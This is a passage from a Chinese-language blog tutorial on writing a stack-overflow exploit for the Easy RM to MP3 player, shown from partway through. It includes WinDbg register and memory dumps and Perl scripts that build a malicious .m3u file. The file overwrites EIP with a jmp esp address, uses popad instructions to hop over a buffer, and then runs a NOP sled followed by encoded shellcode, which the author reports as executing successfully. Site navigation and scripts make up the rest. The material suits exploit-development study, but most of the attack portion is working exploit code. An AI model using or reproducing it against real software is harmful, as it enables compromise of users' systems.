000ffd78  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd88  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd98  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffda8  44 00 43 43 43 43 43 43-43 43 43 43 43 43 43 43  D.CCCCCCCCCCCCCC
0:000&gt; d
000ffdb8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffdc8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffdd8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffde8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffdf8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe08  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe18  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe28  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0:000&gt; d
000ffe38  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe48  43 43 90 90 90 90 90 90-90 90 90 90 90 90 90 90  CC..............
000ffe58  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe68  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe78  90 90 90 90 cc 41 41 41-41 41 41 41 41 41 41 41  .....AAAAAAAAAAA
000ffe88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000ffeb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffed8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>假设我们需要直接在ESP中的13字节“X”里面跳过100字节“D”和160字节“A”（共260字节），末尾再放置shellcode（以NOPs开头，接着放一个”0xcc”，然后A’s（shellcode）。一个popad指令相当于从栈中弹出32字节，因此260字节 = 9 * popad’s - 28 bytes。因此，我们需要在shellcode头部的位置放置一段NOPs，或者起始于shellcode入口地址 + 28字节。至此，我们已在shellcode之前放置NOPs，现在可以尝试使用”popad”指令进入NOPs，然后看程序是否能够中断在断点处。</p>
<p>调整一下脚本，还用我们之前找好的 jmp esp 地址覆盖 EIP 然后用9个 popad 指令替代之前的 X‘s，之后再接上0xff 0xE4(jmp esp)。</p>
<pre><code class="perl">my $file= "test2.m3u";
my $buffersize = 26067;
my $junk= "C" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V',0x01b9f23a);
my $preshellcode = "X" * 4;
$preshellcode = $preshellcode . "\x61" x 9;
$preshellcode = $preshellcode . "\xff\xe4";
$preshellcode = $preshellcode . "\x90" x 3;
 #let's pretend this is the only space we have available
my $garbage = "D" x 100; #let’s pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,"&gt;$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
</code></pre>
<p>打开文件后断在了我们设置的int3断点处。查看一下当前EIP和ESP的情况：</p>
<pre><code>eax=43434343 ebx=43434395 ecx=43434343 edx=43434343 esi=43434343 edi=43434343
eip=000ffe7c esp=000ffdf8 ebp=43434343 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
000ffe7c cc              int     3
0:000&gt; d eip
000ffe7c  cc 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  .AAAAAAAAAAAAAAA
000ffe8c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe9c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffebc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffecc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffedc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d eip-32
000ffe4a  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe5a  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe6a  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe7a  90 90 cc 41 41 41 41 41-41 41 41 41 41 41 41 41  ...AAAAAAAAAAAAA
000ffe8a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe9a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeaa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d esp
000ffdf8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe08  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe18  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe28  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe38  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe48  43 43 90 90 90 90 90 90-90 90 90 90 90 90 90 90  CC..............
000ffe58  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe68  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffe78  90 90 90 90 cc 41 41 41-41 41 41 41 41 41 41 41  .....AAAAAAAAAAA
000ffe88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffed8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffee8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>接下来可以使用真正的shellcode来替换掉”0xcc”</p>
<pre><code>my $file= "test3.m3u";
my $buffersize = 26067;
my $junk= "C" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca"; 
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V',0x01b9f23a);
my $preshellcode = "X" * 4;
$preshellcode = $preshellcode . "\x61" x 9;
$preshellcode = $preshellcode . "\xff\xe4";
$preshellcode = $preshellcode . "\x90" x 3;
 #let's pretend this is the only space we have available
my $garbage = "D" x 100; #let’s pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,"&gt;$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
</code></pre>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210206000619469-1621477705987.png" class="" title="image-20210206000619469">

<p>shellcode执行成功</p>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> exploit编写系列2：栈溢出，跳转至shellcode</li>
        <li><strong>作者:</strong> xiaoeryu</li>
        <li><strong>创建于
                :</strong> 2021-05-20 10:27:25</li>
        
            <li>
                <strong>更新于
                    :</strong> 2023-11-17 19:36:43
            </li>
        
        <li>
            <strong>链接:</strong> https://github.com/xiaoeryu/2021/05/20/exploit编写系列2：栈溢出，跳转至shellcode/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            

            
                本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a> 进行许可。
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/exploit%E7%BC%96%E5%86%99/">#exploit编写</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/%E6%BA%A2%E5%87%BA%E7%B1%BB%E5%9E%8B%E6%BC%8F%E6%B4%9E/">#溢出类型漏洞</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2021/05/20/go%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E8%AE%BE%E7%BD%AE/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">go环境变量设置</span>
						<span class="post-nav-item">上一篇</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%971-Easy-RM-to-MP3-%E6%BC%8F%E6%B4%9E%E8%B0%83%E8%AF%95/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">exploit编写系列1:Easy RM to MP3 漏洞调试</span>
						<span class="post-nav-item">下一篇</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        评论
    </div>
    

        
            


        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">目录</div>
		<div class="page-title">exploit编写系列2：栈溢出，跳转至shellcode</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode"><span class="nav-text">exploit编写系列2：栈溢出，跳转至shellcode</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-jmp-x2F-call-%E5%AF%84%E5%AD%98%E5%99%A8"><span class="nav-text">1. jmp&#x2F;call 寄存器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-pop-pop-ret"><span class="nav-text">2. pop pop ret</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-push-return"><span class="nav-text">3. push return</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x00-%E9%87%8D%E6%96%B0%E8%BF%90%E8%A1%8CEasy-RM-to-MP3%E5%B9%B6%E7%94%A8windbg%E9%99%84%E5%8A%A0"><span class="nav-text">0x00 重新运行Easy RM to MP3并用windbg附加</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-jmp-reg-offset"><span class="nav-text">4. jmp [reg + offset]</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-Blind-return"><span class="nav-text">5. Blind return</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E5%AE%83%E8%B7%B3%E8%BD%AC%E6%96%B9%E5%BC%8F"><span class="nav-text">其它跳转方式</span></a></li></ol></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">xiaoeryu</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        共撰写了 112 篇文章
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="站内搜索您需要的内容..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>



    
<script src="/js/build/tools/localSearch.js" type="module"></script>




    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>